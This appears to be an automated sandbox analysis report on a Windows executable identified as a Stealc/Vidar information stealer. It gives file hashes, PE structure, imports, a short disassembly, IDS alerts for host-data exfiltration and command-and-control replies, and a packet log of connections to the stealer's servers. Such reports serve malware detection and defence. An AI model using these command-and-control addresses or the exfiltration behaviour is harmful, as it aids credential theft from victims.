                                                                                                                                                                                                                                                                        SHA-256:13E0D4EE0042D0FCB3EE9297C5C7274FB232E9FCB52FFC6D3F6A488443408808
                                                                                                                                                                                                                                                                        SHA-512:68A42E26139911E21F7060BEEC2530A52E5C114A830DB0DA1A577F8BE347F222119B50A84ECA282178E84F1AC0A9E799EB4C6907505C3F21D92B700B47AABD71
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....3.../X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.4220713661455715
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:4Svfpi6ceLP/9skLmb0OTqlWSPHaJG8nAgeMZMMhA2fX4WABlEnNV0uhiTw:DvloTqlW+EZMM6DFyn03w
                                                                                                                                                                                                                                                                        MD5:993B428B8CDF8ECAB722FF46DC3201B8
                                                                                                                                                                                                                                                                        SHA1:88E2CCA8B8E942BC8AE303514A867C555DC4C408
                                                                                                                                                                                                                                                                        SHA-256:85DCAC04AD1F3533FE7E8C6F9718036C924360D3DF3A80692C4FAE598EA5BF3E
                                                                                                                                                                                                                                                                        SHA-512:72DD512C01498FD67969DE3A1937523F8E189E9395E665AB540B63144C2025AA737EB90D145010C18B50BC25C1BFE48A06200C76D88BB655D1502DAD2420D2EC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmF../X...............................................................................................................................................................................................................................................................................................................................................*..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        Chrome Cache Entry: 467

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6370)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6375
                                                                                                                                                                                                                                                                        Entropy (8bit):5.796955812384549
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:Eh42Fd6666677GN9wozNttUYA9QN6666Vs5eMiu0rL93nT:Eh4U66666v064Cc6666xMiZXT
                                                                                                                                                                                                                                                                        MD5:892AD260188EB00B377947D4C11F8394
                                                                                                                                                                                                                                                                        SHA1:B7A704ECD76F463A3B8E97104E5117C44C345710
                                                                                                                                                                                                                                                                        SHA-256:6F0B34AA942E66028540133D1283D61A9BBD0FDFEAC7D79C58A2E82FD325A89C
                                                                                                                                                                                                                                                                        SHA-512:8C5C0DD6D49CED222E9A4199414F0F237D9B9346F748BB6BDA46C5BB139750070CC448E7A46606A2CFB5B45C899311BEAFF921B56BA5504B6FF1C478DD820C63
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                        Preview:)]}'.["",["squid games","mount washington avalanche center","college football playoff brackets","aurora borealis northern lights forecast","monopoly go gingerbread gala","western wyoming snow advisory","hertz tesla rental","nosferatu 2024 vampire"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMW55MW4zNzU5Eg9UaHJpbGxlciBzZXJpZXMyvw5kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFhQUFBQ0F3RUJBQUFBQUFBQUFBQUFBQUFGQmdJREJBRUgvOFFBTlJBQUFnRUNCQVFDQndjRkFBQUFBQUFBQVFJREJCRUFCUkloTVVGUllRWVRGQ0l5UW5HQmtTTWtVbUtoc2RFVk0wUEI4UC9FQUJnQkFBTUJBUUFBQUFBQUFBQUFBQ

                                                                                                                                                                                                                                                                        Chrome Cache Entry: 468

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                        Chrome Cache Entry: 469

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):132739
                                                                                                                                                                                                                                                                        Entropy (8bit):5.436762659031187
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:fhkJQ7O4N5dTm+syHEt4W3XdQ4Q6YuSr/nUW2i6o:fIQ7HTt/sHdQ4Q6YDfUW8o
                                                                                                                                                                                                                                                                        MD5:87796B94FBC3723A64A81A5012ADA25D
                                                                                                                                                                                                                                                                        SHA1:3D7FA0468FBE557AD946D7E50358A3A836BAE3BB
                                                                                                                                                                                                                                                                        SHA-256:A3F6BB9180545F45EE4583A1F9388910A9935A876C754FBCECD03641D62DB88A
                                                                                                                                                                                                                                                                        SHA-512:76058F147B92D95965B7B2FAA1B2E40EA95067F04BCE691C746D296617163F4DFA2664A0C0ABE8F7CB3AA35BD7BF5CC301C711527D2D26F4B4B5D4D2109DF6B7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):7.249445729642779
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File size:406'528 bytes
                                                                                                                                                                                                                                                                        MD5:6b3fbdaf99ece34f12dc443f1c630812
                                                                                                                                                                                                                                                                        SHA1:6c553ac99295ba2d02d6aadfc71073d62b2dc414
                                                                                                                                                                                                                                                                        SHA256:68c5557aaa47968336253c86db39f8526d677dc8f0357bc2122ffe3c6a7915b1
                                                                                                                                                                                                                                                                        SHA512:59539a6aff0127c0d1c6d286a0731b41b064d2b7acf7e44f67a075f0aabb88983a6041c8f2d16d43355cb9a0a372e088250269cc34fba3170ac2e9448fac7f18
                                                                                                                                                                                                                                                                        SSDEEP:6144:zcEl1dsPnmVBLJHitx+7GrgIaAMA2Ae52AuRQ1zkIFZQRhtinsoCifEI:l3sPnKB1HitY7GwruRQtkIjQRGns2fE
                                                                                                                                                                                                                                                                        TLSH:7C84AF0175508072DD6725B758BADB9E4A3EF9200B627ACFA3480CBDDF356C1A631B27
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg.........."..................K............@..................................T....@.................................\...P..

                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Entrypoint:0x414bbb
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x6766D9DE [Sat Dec 21 15:08:14 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:0e4c328663ae5868d07c0edb57d0348d

                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        call 00007FABF48047DAh
                                                                                                                                                                                                                                                                        jmp 00007FABF4804649h
                                                                                                                                                                                                                                                                        mov ecx, dword ptr [0043D6C0h]
                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                        mov edi, BB40E64Eh
                                                                                                                                                                                                                                                                        mov esi, FFFF0000h
                                                                                                                                                                                                                                                                        cmp ecx, edi
                                                                                                                                                                                                                                                                        je 00007FABF48047D6h
                                                                                                                                                                                                                                                                        test esi, ecx
                                                                                                                                                                                                                                                                        jne 00007FABF48047F8h
                                                                                                                                                                                                                                                                        call 00007FABF4804801h
                                                                                                                                                                                                                                                                        mov ecx, eax
                                                                                                                                                                                                                                                                        cmp ecx, edi
                                                                                                                                                                                                                                                                        jne 00007FABF48047D9h
                                                                                                                                                                                                                                                                        mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                                        jmp 00007FABF48047E0h
                                                                                                                                                                                                                                                                        test esi, ecx
                                                                                                                                                                                                                                                                        jne 00007FABF48047DCh
                                                                                                                                                                                                                                                                        or eax, 00004711h
                                                                                                                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                                                                                                                        or ecx, eax
                                                                                                                                                                                                                                                                        mov dword ptr [0043D6C0h], ecx
                                                                                                                                                                                                                                                                        not ecx
                                                                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                                                                        mov dword ptr [0043D700h], ecx
                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 14h
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                        xorps xmm0, xmm0
                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                                        call dword ptr [0043A5D8h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                        call dword ptr [0043A590h]
                                                                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                        call dword ptr [0043A58Ch]
                                                                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                        call dword ptr [0043A628h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                        xor eax, ecx
                                                                                                                                                                                                                                                                        leave
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        mov eax, 00004000h
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push 0043EC38h
                                                                                                                                                                                                                                                                        call dword ptr [0043A600h]
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push 00030000h
                                                                                                                                                                                                                                                                        push 00010000h
                                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                                        call 00007FABF480BE08h
                                                                                                                                                                                                                                                                        add esp, 0Ch

                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3a35c0x50.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x3e8.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x410000x2114.reloc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x367e80x18.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x32b780xc0.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x3a5240x178.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000x2f54f0x2f60058bc155b094b6873a22cc988795a8d23False0.5124196075197889data6.453078444758717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rdata0x310000xa9ec0xaa00ee0908da15a0e5d81cca81415109d13bFalse0.4196920955882353data4.875338264838317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0x3c0000x34000x240081d422e119a7deac089cc0743b9210daFalse0.3245442708333333data5.214421128212959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .tls0x400000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .reloc0x410000x21140x2200fb9df7b78b2799ee418116907747d382False0.7449448529411765data6.477521124661293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .bss0x440000x242000x24200085826bb3fe7764af3d497a5048216eeFalse1.0003784602076125data7.998781396642679IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc0x690000x3e80x400883e76629c40ea5b147c1a08572cb57fFalse0.4345703125data3.2839644643892143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_VERSION0x690580x390dataEnglishUnited States0.4517543859649123

                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                                        USER32.dllDefWindowProcW
                                                                                                                                                                                                                                                                        ADVAPI32.dllEqualPrefixSid

                                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-12-27T08:20:05.916706+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549708188.245.216.205443TCP
                                                                                                                                                                                                                                                                        2024-12-27T08:20:10.737976+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549714188.245.216.205443TCP
                                                                                                                                                                                                                                                                        2024-12-27T08:20:10.738391+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1188.245.216.205443192.168.2.549714TCP
                                                                                                                                                                                                                                                                        2024-12-27T08:20:13.235322+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11188.245.216.205443192.168.2.549716TCP

                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:57.069482088 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:57.069497108 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:57.178695917 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.611156940 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.611203909 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.611265898 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.670008898 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.670039892 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.044853926 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.044960976 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.142205954 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.142220974 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.142620087 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.142700911 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.145229101 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.191330910 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696801901 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696831942 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696870089 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696902990 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696903944 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696903944 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.696973085 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.698987007 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.698995113 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.950082064 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.950113058 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.950387955 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.950675011 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.950685978 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.849474907 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.849543095 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.853455067 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.853466988 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.853703022 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.853754997 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.854127884 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:02.895373106 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.545531034 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.545602083 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.545623064 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.545660019 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.548958063 CET49706443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.548976898 CET44349706188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.561300993 CET49708443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:03.561340094 CET44349708188.245.216.205192.168.2.5
